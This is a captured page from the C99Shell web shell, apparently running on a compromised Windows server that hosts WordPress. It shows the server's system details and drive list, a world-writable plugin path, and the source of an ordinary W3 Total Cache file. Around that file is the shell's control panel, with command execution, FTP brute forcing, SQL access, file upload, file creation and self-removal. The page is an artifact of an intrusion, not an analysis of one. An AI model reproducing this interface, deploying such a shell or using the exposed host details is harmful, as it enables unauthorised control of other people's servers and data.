!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\w3-total-cache\lib\W3\Environment\   drwxrwxrwx
Free 3.26 GB of 39.52 GB (8.25%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     WpLoader.php (1.24 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

class W3_Environment_WpLoader {
    
/**
     * Verify that WordPress install folder is part of WP_CONTENT_DIR path
     * @return bool
     */
    
public function should_create() {
        if (
defined('DONOTVERIFY_WP_LOADER') && DONOTVERIFY_WP_LOADER)
            return 
false;
        if (
strpos(WP_PLUGIN_DIRWP_CONTENT_DIR) === false ||
            
strpos(WP_CONTENT_DIRABSPATH) === false) {
            return 
true;
        }
        return 
false;
    }

    
/**
     * @throws FilesystemWriteException
     * @throws FilesystemWriteException
     */
    
public function create() {
        
$path trim(w3_get_wp_sitepath() ,"/");
        if (
$path)
            
$path .= '/';
        
$file_data "
<?php
    if (W3TC_WP_LOADING)
        require_once '" 
w3_get_document_root() . '/' $path "wp-load.php';
"
;
        
$filename W3TC_WP_LOADER;
        
$data $file_data;

        
w3_require_once(W3TC_INC_DIR '/functions/rule.php');
        
$current_data = @file_get_contents($filename);
        if (
strstr(w3_clean_rules($current_data), w3_clean_rules($data)) !== false)
            return;

        
w3_require_once(W3TC_INC_DIR '/functions/activation.php');
        
w3_wp_write_to_file($filename$data''$_SERVER['REQUEST_URI']);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--